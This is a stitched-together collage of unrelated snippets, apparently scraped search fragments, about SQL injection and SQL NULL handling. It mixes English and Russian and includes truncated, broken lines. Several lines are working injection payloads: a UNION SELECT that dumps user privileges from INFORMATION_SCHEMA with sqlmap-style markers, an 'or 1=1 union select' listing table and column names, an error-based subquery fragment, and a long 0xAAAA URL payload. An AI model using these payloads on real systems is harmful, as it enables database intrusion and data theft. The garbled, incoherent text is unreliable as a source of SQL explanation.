Union select null, null, null, null, null, null, null from information_schema.tables. for a small database containing three tables. this instruction is used in sql injection I tried it and it worked but I didn't really know how it works can somebody help me...
qndbq7bbxilyCzFA') UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x716e646271,IFNULL(CAST(grantee AS CHAR),0x20),0x716a716771),NULL FROM INFORMATION_SCHEMA.USER_PRIVILEGES#qjqgq.
99 or 1=1 union select null, concat(table_name,0x0a,column_name) from information_ schema.columns - since where clause cannot be used
(select 1 from(select count(*), concat(( select( select unhex(hex
select, is obvious. null, is just a place holder that is used because a union statement requires that the number of fields match the 1st query that it’s appending to.
Решение: select * from users where id='12'. а ссылка будет выглядеть вот так
SELECT * FROM `mydata`.`mytable` WHERE CONCAT(<list of columns>) IS NOT NULL. All we are missing now is the list of nullable columns, comma-separated. We're going to use the GROUP_CONCAT function to produce the final statement, which we will execute like this
SELECT column_names FROM table_name WHERE column_name IS NOT NULL
+and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA 1000 more A’s). this AAAAA it's more 1000 A. Example in URL
Returns NULL if either argument is NULL. This function does not work properly if the first argument contains a comma (,) character.